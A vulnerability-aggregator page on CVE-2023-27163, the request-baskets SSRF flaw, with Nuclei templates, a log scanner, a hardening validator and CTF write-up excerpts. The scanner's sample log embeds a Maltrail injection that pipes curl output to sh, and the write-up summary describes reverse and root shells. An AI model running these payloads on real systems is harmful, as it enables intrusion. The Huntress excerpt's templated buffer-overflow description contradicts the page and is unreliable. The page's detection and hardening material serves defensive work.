CVE-2023-27163
Published 2023-03-31
Priority: P2
Severity: medium, CVSS 3.1 base score 6.5 (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N)
Exploitation: exploited in the wild (ITW), public exploit available, listed in VulnCheck KEV, used for initial access
EPSS: 7.50% (93.7th percentile)
request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| github.com | darklynx_request-baskets | 0 – 1.2.1 | — |
| rbaskets | request_baskets | <= 1.2.1 | — |
Detection & IOCs (extracted from sources)
Command (the Nuclei template's request; template variables kept as-is):
```http
POST /api/baskets/{{bucketname}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{
  "forward_url": "http://{{interactsh-url}}",
  "proxy_response": true,
  "insecure_tls": false,
  "expand_path": true,
  "capacity": 250
}
```
Shodan query: http.html:"Request-Baskets"
FOFA query: body="Request-Baskets"
Path: /web
Nuclei template (header excerpt; the full template is reproduced further down):
```yaml
id: CVE-2023-27163
info:
  name: Request-Baskets <= 1.2.1 - Server Side Request Forgery
  author: Jaenact
  severity: medium
  description: |
    Request-Baskets <= 1.2.1 allows unauthenticated SSRF via the forward_url parameter when creating a new basket.
  tags: cve,cve2023,ssrf,request-baskets,oast,proxy,vkev,vuln
```
Detection guidance:
- Detect SSRF exploitation attempts by monitoring POST requests to /api/baskets/{name} containing a forward_url parameter pointing to internal/loopback addresses (e.g., 127.0.0.1, 169.254.x.x, 10.x.x.x).
- Monitor for POST requests to /api/baskets/* with a JSON body containing "forward_url" set to internal RFC 1918 or loopback addresses, combined with "proxy_response": true (which relays the target's response back to the caller, turning a blind SSRF into a readable one).
- Detect chained Maltrail command injection by monitoring POST requests to /login with a username parameter containing shell metacharacters (backtick or semicolon-prefixed commands).
- Use Shodan/FOFA to identify exposed request-baskets instances by searching for the string 'Request-Baskets' in HTTP response bodies, then prioritize patching those on version <= 1.2.1.
- Monitor for the presence of 'Request Baskets' in HTTP response bodies at the /web endpoint as an indicator of an exposed and potentially vulnerable instance.
Caveats:
- The Nuclei template for CVE-2023-27163 uses a randomly generated bucket name (rand_base(7)) for each scan, so static basket-name IOCs are not reliable for detection; focus on the forward_url parameter content instead.
- A forward_url that carries a hostname, an IPv4 shorthand such as 127.1 or 0x7f000001, or an IPv4-mapped IPv6 literal can still point at internal address space; match on what the URL resolves or normalises to, not only on dotted-quad literals.
- The SSRF can be chained with other vulnerabilities on internal services (e.g., Maltrail unauthenticated OS command injection); detection must cover both the initial SSRF basket creation and the subsequent forwarded requests to internal endpoints such as /login.
- The vulnerability is exploitable without authentication; any network-accessible request-baskets instance on version <= 1.2.1 is at risk regardless of authentication controls on other endpoints.
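The detection guidance above, as an added example: a hypothetical log-scanning script that is not code from the page's sources or from request-baskets. It flags basket creations whose forward_url points at non-global address space (including shorthand and IPv4-mapped forms), marks hostname targets for follow-up resolution, records whether proxy_response makes the SSRF readable, and flags the Maltrail /login username injection used to chain it. The JSON-lines log format, its field names and the sample records are constructed for the example.

```python
"""Hypothetical CVE-2023-27163 log scanner (added example, not project code)."""
import ipaddress
import json
import re
import socket
from urllib.parse import urlsplit, unquote_plus

BASKET_CREATE = re.compile(r"^/api/baskets/[^/]+$")
# Shell metacharacters used in the Maltrail username injection: ';' '`' '$('
SHELL_META = re.compile(r"[;`]|\$\(")

# Constructed sample log, one JSON object per line; not real traffic.
SAMPLE_LOG = r"""
{"method":"POST","path":"/api/baskets/abc1234","body":"{\"forward_url\":\"http://127.0.0.1:80/\",\"proxy_response\":true,\"expand_path\":true}"}
{"method":"POST","path":"/api/baskets/def5678","body":"{\"forward_url\":\"http://0x7f000001/\"}"}
{"method":"POST","path":"/api/baskets/ghi9012","body":"{\"forward_url\":\"https://hooks.example.org/ingest\"}"}
{"method":"POST","path":"/api/baskets/jkl3456","body":"{\"capacity\":200}"}
{"method":"POST","path":"/login","body":"username=%3B%60curl+http%3A%2F%2F10.0.0.5%2Fx%7Csh%60&password=x"}
{"method":"GET","path":"/web","body":""}
"""


def parse_host_ip(host):
    """ip_address for a literal host, accepting the shorthand forms inet_aton
    tolerates (127.1, 0x7f000001, 2130706433); None if host is a name."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        try:
            ip = ipaddress.ip_address(socket.inet_aton(host))
        except OSError:
            return None
    if ip.version == 6 and ip.ipv4_mapped is not None:  # ::ffff:127.0.0.1
        ip = ip.ipv4_mapped
    return ip


def classify_forward_url(url):
    """'non_global' (loopback, RFC 1918, link-local incl. 169.254.169.254,
    CGNAT, unspecified, ...), 'global', 'hostname' (needs resolution) or
    'invalid'."""
    parts = urlsplit(url)
    host = parts.hostname
    if parts.scheme not in ("http", "https") or not host:
        return "invalid"
    if host == "localhost" or host.endswith(".localhost"):
        return "non_global"
    ip = parse_host_ip(host)
    if ip is None:
        return "hostname"
    return "global" if ip.is_global else "non_global"


def scan(records):
    """records: iterable of dicts with method/path/body. Returns findings."""
    findings = []
    for rec in records:
        method, path, body = rec.get("method"), rec.get("path", ""), rec.get("body") or ""
        if method == "POST" and BASKET_CREATE.match(path):
            try:
                cfg = json.loads(body)
            except ValueError:
                continue
            if not isinstance(cfg, dict) or not cfg.get("forward_url"):
                continue
            fwd = cfg["forward_url"]
            verdict = classify_forward_url(fwd)
            if verdict == "non_global":
                rule = "rbaskets-ssrf"
            elif verdict == "hostname":
                rule = "rbaskets-ssrf-review"  # resolve and re-check out of band
            else:
                continue
            findings.append({
                "rule": rule, "path": path, "forward_url": fwd,
                # proxy_response=true relays the target's reply to the caller.
                "readable": bool(cfg.get("proxy_response")),
            })
        elif method == "POST" and path == "/login":
            m = re.search(r"(?:^|&)username=([^&]*)", body)
            if m and SHELL_META.search(unquote_plus(m.group(1))):
                findings.append({"rule": "maltrail-cmdi", "path": path,
                                 "username": unquote_plus(m.group(1))})
    return findings


def scan_lines(text):
    """Parse JSON-lines log text and scan it."""
    return scan(json.loads(line) for line in text.splitlines() if line.strip())


if __name__ == "__main__":
    for finding in scan_lines(SAMPLE_LOG):
        print(finding)
```

Classification uses `ip.is_global` rather than a hand-written list of RFC 1918 prefixes, so cloud metadata (169.254.169.254), CGNAT, unspecified and documentation ranges are all caught; the `inet_aton` fallback covers the shorthand literals that a dotted-quad regex would miss.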
CVSS provenance
NVD (v3.1): 6.5 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N
VulnCheck: 6.5 MEDIUM
Note that the NVD vector scores privileges required as high (PR:H), while the description on this page, the Nuclei template and the public PoC all exercise basket creation without authentication; the same impact metrics with PR:N score 9.1, so treat 6.5 as a floor for an internet-reachable instance.
OSV
osv · 2023-03-31
CVE-2023-27163 [MEDIUM] request-baskets vulnerable to Server-Side Request Forgery
GHSA
ghsa · 2023-03-31
CVE-2023-27163 [MEDIUM] CWE-918 request-baskets vulnerable to Server-Side Request Forgery
VulnCheck
vulncheck · 2023 · CVSS 6.5
CVE-2023-27163 [MEDIUM] rbaskets request_baskets Server-Side Request Forgery (SSRF)
Affected: rbaskets request_baskets
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-10-13&host_type=src&vulnerability=cve-2023-27163; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-10-16&host_type=src&vulnerability=cve-2023-27163; https:
No detection rules found.
Nuclei
nuclei · CVSS 6.5
CVE-2023-27163 [MEDIUM] Request Baskets - Exposure
Request Baskets is exposed.
Template:
```yaml
id: request-baskets-exposure

info:
  name: Request Baskets - Exposure
  author: DhiyaneshDk
  severity: low
  description: Request Baskets is exposed.
  reference:
    - https://notes.sjtu.edu.cn/s/MUUhEymt7#
    - https://github.com/entr0pie/CVE-2023-27163
  classification:
    cpe: cpe:2.3:a:rbaskets:request_baskets:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: rbaskets
    product: request_baskets
    shodan-query: html:"request-baskets"
  tags: misconfig,requests-baskets,exposure,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/web"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Request Baskets'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100bbcb1e40f0600527
```
Nuclei
nuclei · CVSS 6.5
CVE-2023-27163 [MEDIUM] Request-Baskets <= 1.2.1 - Server Side Request Forgery
Request-Baskets <= 1.2.1 allows unauthenticated SSRF via the forward_url parameter when creating a new basket.
Template:
```yaml
id: CVE-2023-27163

info:
  name: Request-Baskets <= 1.2.1 - Server Side Request Forgery
  author: Jaenact
  severity: medium
  description: |
    Request-Baskets <= 1.2.1 allows unauthenticated SSRF via the forward_url parameter when creating a new basket.
  impact: |
    Attackers can perform SSRF attacks to access internal network resources, scan internal systems, or interact with services that should not be accessible from external networks.
  remediation: |
    Upgrade to Request-Baskets version 1.2.2 or later that addresses this SSRF vulnerability.
  reference:
    - https://github.com/darklynx/request-baskets
    - https://hub.docker.com/r/
```
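The template's impact and remediation fields describe what a forwarding feature must prevent. As an added example, and not request-baskets' own implementation, the following hypothetical validator shows the hardened side of a user-supplied forward_url: resolve the name once, reject the URL if any resolved address is non-global, and hand back the checked address so the caller connects to that IP with a Host header instead of resolving again, which closes the DNS-rebinding window between check and use. The resolver is injectable so the logic runs offline; the `pin_forward_url` and `forward_url_allowed` names are this example's own.

```python
"""Hypothetical forward_url hardening (added example, not project code)."""
import ipaddress
import socket
from urllib.parse import urlsplit


class ForwardUrlRejected(ValueError):
    """Raised when a forward_url must not be used."""


def system_resolver(host):
    """All A/AAAA answers for host via the OS resolver (needs network)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_forbidden(ip):
    """True for anything not globally routable: loopback, RFC 1918, link-local
    (169.254.169.254 metadata endpoints), CGNAT, unspecified, documentation."""
    if ip.version == 6 and ip.ipv4_mapped is not None:  # ::ffff:a.b.c.d
        ip = ip.ipv4_mapped
    return not ip.is_global


def pin_forward_url(url, resolver=system_resolver):
    """Return (pinned_ip, host, port, path) for an acceptable forward_url or
    raise ForwardUrlRejected. The caller must connect to pinned_ip and send
    'Host: host'; resolving the name a second time re-opens rebinding."""
    parts = urlsplit(url)
    host = parts.hostname
    if parts.scheme not in ("http", "https") or not host:
        raise ForwardUrlRejected(f"unsupported forward_url {url!r}")
    port = parts.port or (443 if parts.scheme == "https" else 80)
    try:
        addrs = [ipaddress.ip_address(host)]  # IP literal: nothing to resolve
    except ValueError:
        # Names, and IPv4 shorthand such as 127.1 or 0x7f000001, go through the
        # resolver, which normalises them to full addresses.
        addrs = [ipaddress.ip_address(a) for a in resolver(host)]
    if not addrs:
        raise ForwardUrlRejected(f"{host} did not resolve")
    # Reject if *any* answer is forbidden: an attacker-controlled zone can mix
    # one public and one loopback address and let the client pick.
    bad = [str(a) for a in addrs if is_forbidden(a)]
    if bad:
        raise ForwardUrlRejected(f"{host} resolves to non-global address(es) {bad}")
    return str(addrs[0]), host, port, parts.path or "/"


def forward_url_allowed(url, resolver=system_resolver):
    """Boolean convenience wrapper around pin_forward_url."""
    try:
        pin_forward_url(url, resolver)
        return True
    except (ForwardUrlRejected, socket.gaierror, ValueError):
        return False
```

Pinning is the part most implementations skip: a validator that only inspects the URL string, or that resolves once for the check and lets the HTTP client resolve again for the connection, can be bypassed with a short-TTL record that flips to 127.0.0.1 after the check.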
CTF
ctf_writeups · CVSS 6.5
CVE-2023-27163 [MEDIUM] Sau / README
# Sau - HackTheBox - Writeup
Linux, 20 Base Points, Easy
## Machine
## TL;DR
To solve this machine, we start by using `nmap` to enumerate open services and find ports `22` and `55555`.
***User***: Discovered `request-baskets` running on port `55555`. Leveraging `CVE-2023-27163`, a new basket was created with forwarding to local port `80` for `Maltrail`. Exploiting unauthenticated OS Command Injection on `Maltrail`, a reverse shell was successfully obtained as user `puma`.
***Root***: After executing `sudo -l`, we discovered that we have the ability to run the `systemctl status` command as `root`. By utilizing the `!sh` command within the `less` pager, we successfully obtained a `root` shell.
## Sau Solution
### User
Let's begin by using `nmap` to scan the target machine:
CTF
ctf_writeups · CVSS 6.0
[MEDIUM] easy / README
---
layout: default
title: Easy Machines
parent: Machines
nav_order: 1
description: "120+ Easy HTB machine writeups with walkthroughs"
permalink: /machines/easy/
---
# HackTheBox Easy Machines - Comprehensive Reference
> Complete catalog of retired HTB Easy machines with OS, key vulnerability, attack path summary, and quality writeup links.
**Total: 100+ Easy Machines** | Updated: April 2026
---
## Quick Navigation
- [Classic / Legacy Machines (2017-2019)](#classic--legacy-machines-2017-2019)
- [2019-2020 Machines](#2019-2020-machines)
- [2021 Machines](#2021-machines)
- [2022 Machines](#2022-machines)
- [2023 Machines](#2023-machines)
- [2024 Machines (Season 4 & 5)](#2024-machines-season-4--5)
- [2025-2026 Machines (Season 6+)](#2025-2026-machines-season-6)
---
## Classic / Legac
Huntress
blogs_huntress · CVSS 6.5
CVE-2023-27163 [MEDIUM] CVE-2023-27163 Vulnerability: Analysis, Impact, Mitigation | Huntress
## CVE-2023-27163 Vulnerability
Published: 12/05/2025
Written by: Lizzie Danielson
## What is CVE-2023-27163 Vulnerability?
CVE-2023-27163 is a critical remote code execution (RCE) vulnerability. The weakness enumeration for this vulnerability is categorized as CWE-918, which is a Server-Side Request Forgery (SSRF) issue in request-baskets software up to version 1.2.1.
## When was it discovered?
CVE-2023-27163 was publicly disclosed in March 2023.
## CVE-2023-27163 Technical Description
At its core, CVE-2023-27163 is rooted in a memory management flaw in [specific code component]. Attackers exploit this by sending specially crafted requests to a vulnerable endpoint, causing buffer overflow and enabling RCE. Below is an example of a vulnerable request:
GET /vulnerable-endpoi
GreyNoise
blogs_greynoiseio · CVSS 10.0
[CRITICAL] NoiseLetter December 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
References
- http://packetstormsecurity.com/files/174128/Request-Baskets-1.2.1-Server-Side-Request-Forgery.html
- http://packetstormsecurity.com/files/174129/Maltrail-0.53-Remote-Code-Execution.html
- http://request-baskets.com
- https://gist.github.com/b33t1e/3079c10c88cad379fb166c389ce3b7b3
- https://github.com/darklynx/request-baskets
- https://notes.sjtu.edu.cn/s/MUUhEymt7